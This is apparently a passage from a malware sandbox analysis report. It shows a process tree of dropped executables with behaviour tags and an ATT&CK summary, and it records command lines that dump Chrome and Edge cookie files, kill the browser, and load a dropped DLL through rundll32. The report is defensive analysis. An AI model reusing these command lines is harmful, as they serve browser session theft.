C:\Users\Admin\Documents\BM_E_RdgTpiYFiPRwI_U1LO_.exe"C:\Users\Admin\Documents\BM_E_RdgTpiYFiPRwI_U1LO_.exe"8⤵PID:7128
-
-
-
-
-
-
-
C:\Users\Admin\Documents\sY07eraSUn_mxBuBdNDCn059.exe"C:\Users\Admin\Documents\sY07eraSUn_mxBuBdNDCn059.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6080
-
-
C:\Users\Admin\Documents\wcvBkjEvJwuMtZyCqWUE6pBz.exe"C:\Users\Admin\Documents\wcvBkjEvJwuMtZyCqWUE6pBz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6092
-
-
C:\Users\Admin\Documents\RO3QNbYnukhvSgCvLm09jbuj.exe"C:\Users\Admin\Documents\RO3QNbYnukhvSgCvLm09jbuj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6048 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2448
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2096
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6424
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6864
-
-
-
C:\Users\Admin\Documents\WqU8afrqJ_wEl7LC18l5PV1i.exe"C:\Users\Admin\Documents\WqU8afrqJ_wEl7LC18l5PV1i.exe"3⤵
- Executes dropped EXE
PID:6024
-
-
C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe"C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe"3⤵
- Executes dropped EXE
PID:6036 -
C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exeC:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe4⤵PID:4032
-
-
C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exeC:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe4⤵PID:5352
-
-
C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exeC:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe4⤵PID:5360
-
-
C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exeC:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe4⤵PID:2452
-
-
C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exeC:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe4⤵PID:4360
-
-
C:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exeC:\Users\Admin\Documents\v9rmvwLlLvA5U9ymdLMEUTJW.exe4⤵PID:2488
-
-
-
C:\Users\Admin\Documents\lmaJgmjUdnJRcF8me39B6cpp.exe"C:\Users\Admin\Documents\lmaJgmjUdnJRcF8me39B6cpp.exe"3⤵
- Executes dropped EXE
PID:6020 -
C:\Users\Admin\Documents\lmaJgmjUdnJRcF8me39B6cpp.exe"C:\Users\Admin\Documents\lmaJgmjUdnJRcF8me39B6cpp.exe"4⤵PID:2208
-
-
-
C:\Users\Admin\Documents\efZJSzwJLtDVOkr6nI6JeUNG.exe"C:\Users\Admin\Documents\efZJSzwJLtDVOkr6nI6JeUNG.exe"3⤵
- Executes dropped EXE
PID:6000 -
C:\Users\Admin\AppData\Roaming\2930291.exe"C:\Users\Admin\AppData\Roaming\2930291.exe"4⤵PID:3148
-
-
C:\Users\Admin\AppData\Roaming\6864878.exe"C:\Users\Admin\AppData\Roaming\6864878.exe"4⤵PID:4760
-
-
-
C:\Users\Admin\Documents\9eTvqwvLIlaadnIeHwiSKWLU.exe"C:\Users\Admin\Documents\9eTvqwvLIlaadnIeHwiSKWLU.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3208
-
-
C:\Users\Admin\Documents\w9dso34OfUUaZ8ZCNNnLh8kf.exe"C:\Users\Admin\Documents\w9dso34OfUUaZ8ZCNNnLh8kf.exe"3⤵
- Executes dropped EXE
PID:6012 -
C:\Users\Admin\Documents\w9dso34OfUUaZ8ZCNNnLh8kf.exeC:\Users\Admin\Documents\w9dso34OfUUaZ8ZCNNnLh8kf.exe4⤵PID:5272
-
-
-
C:\Users\Admin\Documents\EmTzd0lcH7R71dNGqBDqz17C.exe"C:\Users\Admin\Documents\EmTzd0lcH7R71dNGqBDqz17C.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5132 -
C:\Users\Admin\Documents\EmTzd0lcH7R71dNGqBDqz17C.exe"C:\Users\Admin\Documents\EmTzd0lcH7R71dNGqBDqz17C.exe" -a4⤵PID:6016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4292
-
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4396
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4964
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2320
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:1232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4528
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4768
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4876
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4036
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4976
-
C:\Users\Admin\AppData\Local\Temp\4978.exeC:\Users\Admin\AppData\Local\Temp\4978.exe1⤵PID:5944
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:5216 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:5180
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:5820
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:4912 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:2488
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4296
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6528
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1